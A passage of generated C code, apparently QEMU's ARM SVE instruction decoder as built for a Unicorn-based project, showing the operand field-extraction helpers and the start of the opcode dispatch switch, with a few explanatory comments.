arg_rri *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->imm = deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2)); } static void disas_sve_extract_disas_sve_Fmt_63(DisasContext *ctx, arg_disas_sve30 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->u = extract32(insn, 17, 1); a->h = extract32(insn, 16, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_64(DisasContext *ctx, arg_disas_sve31 *a, uint32_t insn) { a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); } static void disas_sve_extract_disas_sve_Fmt_65(DisasContext *ctx, arg_ptrue *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->s = extract32(insn, 16, 1); a->pat = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_disas_sve_Fmt_66(DisasContext *ctx, arg_disas_sve32 *a, uint32_t insn) { } static void disas_sve_extract_disas_sve_Fmt_67(DisasContext *ctx, arg_disas_sve33 *a, uint32_t insn) { a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_disas_sve_Fmt_68(DisasContext *ctx, arg_disas_sve34 *a, uint32_t insn) { a->s = extract32(insn, 22, 1); a->pg = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_disas_sve_Fmt_69(DisasContext *ctx, arg_disas_sve35 *a, uint32_t insn) { a->rn = extract32(insn, 5, 4); } static void disas_sve_extract_disas_sve_Fmt_70(DisasContext *ctx, arg_disas_sve36 *a, uint32_t insn) { a->sf = extract32(insn, 22, 1); a->rm = extract32(insn, 16, 5); a->rn = extract32(insn, 5, 5); a->ne = extract32(insn, 4, 1); } static void disas_sve_extract_disas_sve_Fmt_71(DisasContext *ctx, arg_disas_sve37 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->sf = extract32(insn, 12, 1); a->u = extract32(insn, 11, 1); a->rn = extract32(insn, 5, 5); a->eq = extract32(insn, 4, 1); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_disas_sve_Fmt_72(DisasContext *ctx, arg_disas_sve38 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = extract32(insn, 5, 8); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_73(DisasContext *ctx, arg_disas_sve38 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rd = extract32(insn, 0, 5); a->imm = expand_imm_sh8s(ctx, extract32(insn, 5, 9)); } static void disas_sve_extract_disas_sve_Fmt_74(DisasContext *ctx, arg_disas_sve39 *a, uint32_t insn) { a->sz = extract32(insn, 22, 1); a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_75(DisasContext *ctx, arg_disas_sve40 *a, uint32_t insn) { a->index = extract32(insn, 19, 2); a->rm = extract32(insn, 16, 3); a->u = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->sz = 0; a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_76(DisasContext *ctx, arg_disas_sve40 *a, uint32_t insn) { a->index = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->u = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->sz = 1; a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_77(DisasContext *ctx, arg_disas_sve41 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rot = extract32(insn, 16, 1); a->pg = extract32(insn, 10, 3); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); 
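/* Field extraction uses QEMU's bitops helpers: extract32(insn, pos, len)
 * reads an unsigned bitfield, sextract32() a sign-extended one, and
 * deposit32(base, pos, len, field) splices split fields back together.
 * Writing both rd and rn (or rd and ra) from bits [4:0] models the
 * destructive "Zdn" operand that SVE encodes only once. */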
a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_78(DisasContext *ctx, arg_disas_sve42 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->rot = extract32(insn, 13, 2); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_79(DisasContext *ctx, arg_disas_sve43 *a, uint32_t insn) { a->index = extract32(insn, 19, 2); a->rm = extract32(insn, 16, 3); a->rot = extract32(insn, 10, 2); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->esz = 1; } static void disas_sve_extract_disas_sve_Fmt_80(DisasContext *ctx, arg_disas_sve43 *a, uint32_t insn) { a->index = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->rot = extract32(insn, 10, 2); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->esz = 2; } static void disas_sve_extract_disas_sve_Fmt_81(DisasContext *ctx, arg_disas_sve44 *a, uint32_t insn) { a->rm = extract32(insn, 16, 3); a->sub = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->index = deposit32(extract32(insn, 19, 2), 2, 30, extract32(insn, 22, 1)); a->esz = 1; } static void disas_sve_extract_disas_sve_Fmt_82(DisasContext *ctx, arg_disas_sve44 *a, uint32_t insn) { a->index = extract32(insn, 19, 2); a->rm = extract32(insn, 16, 3); a->sub = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->esz = 2; } static void disas_sve_extract_disas_sve_Fmt_83(DisasContext *ctx, arg_disas_sve44 *a, uint32_t insn) { a->index = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->sub = extract32(insn, 10, 1); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); a->esz = 3; } static void disas_sve_extract_disas_sve_Fmt_84(DisasContext *ctx, arg_disas_sve45 *a, uint32_t insn) { a->rm = extract32(insn, 16, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->index = deposit32(extract32(insn, 19, 2), 2, 30, extract32(insn, 22, 1)); a->esz = 1; } static void disas_sve_extract_disas_sve_Fmt_85(DisasContext *ctx, arg_disas_sve45 *a, uint32_t insn) { a->index = extract32(insn, 19, 2); a->rm = extract32(insn, 16, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = 2; } static void disas_sve_extract_disas_sve_Fmt_86(DisasContext *ctx, arg_disas_sve45 *a, uint32_t insn) { a->index = extract32(insn, 20, 1); a->rm = extract32(insn, 16, 4); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = 3; } static void disas_sve_extract_disas_sve_Fmt_87(DisasContext *ctx, arg_disas_sve46 *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = extract32(insn, 16, 3); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_disas_sve_Fmt_88(DisasContext *ctx, arg_rpri_load *a, uint32_t insn) { a->imm = extract32(insn, 16, 6); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->dtype = deposit32(extract32(insn, 13, 2), 2, 30, extract32(insn, 23, 2)); a->nreg = 0; } static void disas_sve_extract_disas_sve_Fmt_89(DisasContext *ctx, arg_disas_sve47 *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); } static void disas_sve_extract_incdec2_cnt(DisasContext *ctx, arg_incdec2_cnt *a, uint32_t insn) { 
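/* plus1() biases the 4-bit multiplier field into the 1..16 range used by
 * the SVE element-count INC/DEC group; rn is set equal to rd because these
 * instructions read and write the same register. */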
a->esz = extract32(insn, 22, 2); a->pat = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->imm = plus1(ctx, extract32(insn, 16, 4)); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_incdec2_pred(DisasContext *ctx, arg_incdec2_pred *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_incdec_cnt(DisasContext *ctx, arg_incdec_cnt *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pat = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->imm = plus1(ctx, extract32(insn, 16, 4)); } static void disas_sve_extract_incdec_pred(DisasContext *ctx, arg_incdec_pred *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_pd_pg_pn_pm_s(DisasContext *ctx, arg_rprr_s *a, uint32_t insn) { a->s = extract32(insn, 22, 1); a->rm = extract32(insn, 16, 4); a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_pn_s(DisasContext *ctx, arg_rpr_s *a, uint32_t insn) { a->s = extract32(insn, 22, 1); a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_pn_s0(DisasContext *ctx, arg_rpr_s *a, uint32_t insn) { a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); a->s = 0; } static void disas_sve_extract_pd_pg_rn(DisasContext *ctx, arg_rpr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_rn_i5(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = sextract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_rn_i7(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = extract32(insn, 14, 7); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pg_rn_rm(DisasContext *ctx, arg_rprr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pn(DisasContext *ctx, arg_rr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_pn_e0(DisasContext *ctx, arg_rr_esz *a, uint32_t insn) { a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); a->esz = 0; } static void disas_sve_extract_pd_pn_pm(DisasContext *ctx, arg_rrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 4); } static void disas_sve_extract_pd_rn_i9(DisasContext *ctx, arg_rri *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 4); a->imm = deposit32(extract32(insn, 10, 3), 3, 29, sextract32(insn, 16, 6)); } static void disas_sve_extract_rd_pg4_pn(DisasContext *ctx, arg_rpr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 4); a->rd = extract32(insn, 0, 5); } static void 
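/* Governing-predicate fields come in two widths: most data-processing forms
 * can encode only p0-p7 (3-bit pg), while the _pg4 variants can name any of
 * p0-p15. */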
disas_sve_extract_rd_pg4_rn_rm(DisasContext *ctx, arg_rprr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 4); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_pg_rn(DisasContext *ctx, arg_rpr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_pg_rn_e0(DisasContext *ctx, arg_rpr_esz *a, uint32_t insn) { a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = 0; } static void disas_sve_extract_rd_rn(DisasContext *ctx, arg_rr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_rn_i6(DisasContext *ctx, arg_rri *a, uint32_t insn) { a->rn = extract32(insn, 16, 5); a->imm = sextract32(insn, 5, 6); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_rn_i9(DisasContext *ctx, arg_rri *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->imm = deposit32(extract32(insn, 10, 3), 3, 29, sextract32(insn, 16, 6)); } static void disas_sve_extract_rd_rn_msz_rm(DisasContext *ctx, arg_rrri *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->imm = extract32(insn, 10, 2); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_rn_rm(DisasContext *ctx, arg_rrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rd_rn_rm_e0(DisasContext *ctx, arg_rrr_esz *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = 0; } static void disas_sve_extract_rd_rn_tszimm(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->esz = tszimm_esz(ctx, deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2))); } static void disas_sve_extract_rda_pg_rn_rm(DisasContext *ctx, arg_rprrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->ra = extract32(insn, 0, 5); } static void disas_sve_extract_rdm_pg_rn(DisasContext *ctx, arg_rprr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rm = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_dbm(DisasContext *ctx, arg_rr_dbm *a, uint32_t insn) { a->dbm = extract32(insn, 5, 13); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_i1(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->imm = extract32(insn, 5, 1); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_i8s(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = sextract32(insn, 5, 8); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_i8u(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->imm = extract32(insn, 5, 8); a->rd = extract32(insn, 0, 5); a->rn = 
extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg4(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 16, 4); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg_ra_rm(DisasContext *ctx, arg_rprrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->ra = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg_rm(DisasContext *ctx, arg_rprr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->pg = extract32(insn, 10, 3); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg_rm_ra(DisasContext *ctx, arg_rprrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->ra = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_pg_tszimm(DisasContext *ctx, arg_rpri_esz *a, uint32_t insn) { a->pg = extract32(insn, 10, 3); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); a->esz = tszimm_esz(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); } static void disas_sve_extract_rdn_rm(DisasContext *ctx, arg_rrr_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rm = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); } static void disas_sve_extract_rdn_sh_i8u(DisasContext *ctx, arg_rri_esz *a, uint32_t insn) { a->esz = extract32(insn, 22, 2); a->rd = extract32(insn, 0, 5); a->rn = extract32(insn, 0, 5); a->imm = expand_imm_sh8u(ctx, extract32(insn, 5, 9)); } static void disas_sve_extract_rpri_g_load(DisasContext *ctx, arg_rpri_gather_load *a, uint32_t insn) { a->msz = extract32(insn, 23, 2); a->imm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rpri_load_dt(DisasContext *ctx, arg_rpri_load *a, uint32_t insn) { a->dtype = extract32(insn, 21, 4); a->imm = sextract32(insn, 16, 4); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rpri_load_msz(DisasContext *ctx, arg_rpri_load *a, uint32_t insn) { a->imm = sextract32(insn, 16, 4); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->dtype = msz_dtype(ctx, extract32(insn, 23, 2)); } static void disas_sve_extract_rpri_scatter_store(DisasContext *ctx, arg_rpri_scatter_store *a, uint32_t insn) { a->msz = extract32(insn, 23, 2); a->imm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rpri_store_msz(DisasContext *ctx, arg_rpri_store *a, uint32_t insn) { a->msz = extract32(insn, 23, 2); a->imm = sextract32(insn, 16, 4); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_g_load_sc(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->scale = extract32(insn, 21, 1); a->rm = extract32(insn, 16, 5); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->xs = 2; } static void 
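/* Gather-load formats: xs selects how the vector index is extended or
 * shifted. Variants that hard-code xs = 2 appear to be the 64-bit-offset
 * forms; the 32-bit-offset forms take xs from bit 22 instead. */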
disas_sve_extract_rprr_g_load_u(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->xs = 2; } static void disas_sve_extract_rprr_g_load_u_sc(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->scale = extract32(insn, 21, 1); a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->xs = 2; } static void disas_sve_extract_rprr_g_load_xs_sc(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->xs = extract32(insn, 22, 1); a->scale = extract32(insn, 21, 1); a->rm = extract32(insn, 16, 5); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_g_load_xs_u(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->xs = extract32(insn, 22, 1); a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_g_load_xs_u_sc(DisasContext *ctx, arg_rprr_gather_load *a, uint32_t insn) { a->xs = extract32(insn, 22, 1); a->scale = extract32(insn, 21, 1); a->rm = extract32(insn, 16, 5); a->u = extract32(insn, 14, 1); a->ff = extract32(insn, 13, 1); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_load_dt(DisasContext *ctx, arg_rprr_load *a, uint32_t insn) { a->dtype = extract32(insn, 21, 4); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_load_msz(DisasContext *ctx, arg_rprr_load *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->dtype = msz_dtype(ctx, extract32(insn, 23, 2)); } static void disas_sve_extract_rprr_scatter_store(DisasContext *ctx, arg_rprr_scatter_store *a, uint32_t insn) { a->msz = extract32(insn, 23, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_store(DisasContext *ctx, arg_rprr_store *a, uint32_t insn) { a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); } static void disas_sve_extract_rprr_store_esz_n0(DisasContext *ctx, arg_rprr_store *a, uint32_t insn) { a->esz = extract32(insn, 21, 2); a->rm = extract32(insn, 16, 5); a->pg = extract32(insn, 10, 3); a->rn = extract32(insn, 5, 5); a->rd = extract32(insn, 0, 5); a->nreg = 0; } bool disas_sve(DisasContext *ctx, uint32_t insn) { union { arg_disas_sve25 f_disas_sve25; arg_disas_sve26 f_disas_sve26; arg_disas_sve27 f_disas_sve27; arg_disas_sve28 f_disas_sve28; arg_disas_sve29 f_disas_sve29; arg_disas_sve30 f_disas_sve30; arg_disas_sve31 f_disas_sve31; arg_disas_sve32 f_disas_sve32; arg_disas_sve33 f_disas_sve33; arg_disas_sve34 f_disas_sve34; arg_disas_sve35 f_disas_sve35; arg_disas_sve36 f_disas_sve36; arg_disas_sve37 f_disas_sve37; arg_disas_sve38 f_disas_sve38; arg_disas_sve39 f_disas_sve39; arg_disas_sve40 f_disas_sve40; 
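/* One union member per argument format; the decoder fills exactly one of
 * these per instruction and passes it to the matching trans_ hook. The
 * decode itself is a nest of switches over fixed opcode bits, with the
 * binary-pattern comments (dots marking operand bits) derived from the
 * patterns in sve.decode. */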
arg_disas_sve41 f_disas_sve41; arg_disas_sve42 f_disas_sve42; arg_disas_sve43 f_disas_sve43; arg_disas_sve44 f_disas_sve44; arg_disas_sve45 f_disas_sve45; arg_disas_sve46 f_disas_sve46; arg_disas_sve47 f_disas_sve47; arg_incdec2_cnt f_incdec2_cnt; arg_incdec2_pred f_incdec2_pred; arg_incdec_cnt f_incdec_cnt; arg_incdec_pred f_incdec_pred; arg_ptrue f_ptrue; arg_rpr_esz f_rpr_esz; arg_rpr_s f_rpr_s; arg_rpri_esz f_rpri_esz; arg_rpri_gather_load f_rpri_gather_load; arg_rpri_load f_rpri_load; arg_rpri_scatter_store f_rpri_scatter_store; arg_rpri_store f_rpri_store; arg_rprr_esz f_rprr_esz; arg_rprr_gather_load f_rprr_gather_load; arg_rprr_load f_rprr_load; arg_rprr_s f_rprr_s; arg_rprr_scatter_store f_rprr_scatter_store; arg_rprr_store f_rprr_store; arg_rprrr_esz f_rprrr_esz; arg_rr_dbm f_rr_dbm; arg_rr_esz f_rr_esz; arg_rri f_rri; arg_rri_esz f_rri_esz; arg_rrr_esz f_rrr_esz; arg_rrri f_rrri; } u; switch ((insn >> 25) & 0x7f) { case 0x2: /* 0000010. ........ ........ ........ */ switch (insn & 0x01200000) { case 0x00000000: /* 00000100 ..0..... ........ ........ */ switch ((insn >> 13) & 0x7) { case 0x0: /* 00000100 ..0..... 000..... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 00000100 ..000000 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:245 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_ADD_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1: /* 00000100 ..000001 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:246 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SUB_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x3: /* 00000100 ..000011 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:247 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_SUB_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x8: /* 00000100 ..001000 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:250 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SMAX_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x9: /* 00000100 ..001001 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:251 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UMAX_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0xa: /* 00000100 ..001010 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:252 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SMIN_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0xb: /* 00000100 ..001011 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:253 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UMIN_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0xc: /* 00000100 ..001100 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:254 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SABD_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0xd: /* 00000100 ..001101 000..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:255 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UABD_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x10: /* 00000100 ..010000 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:258 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_MUL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x12: /* 00000100 ..010010 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:259 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SMULH_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x13: /* 00000100 ..010011 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:260 */ 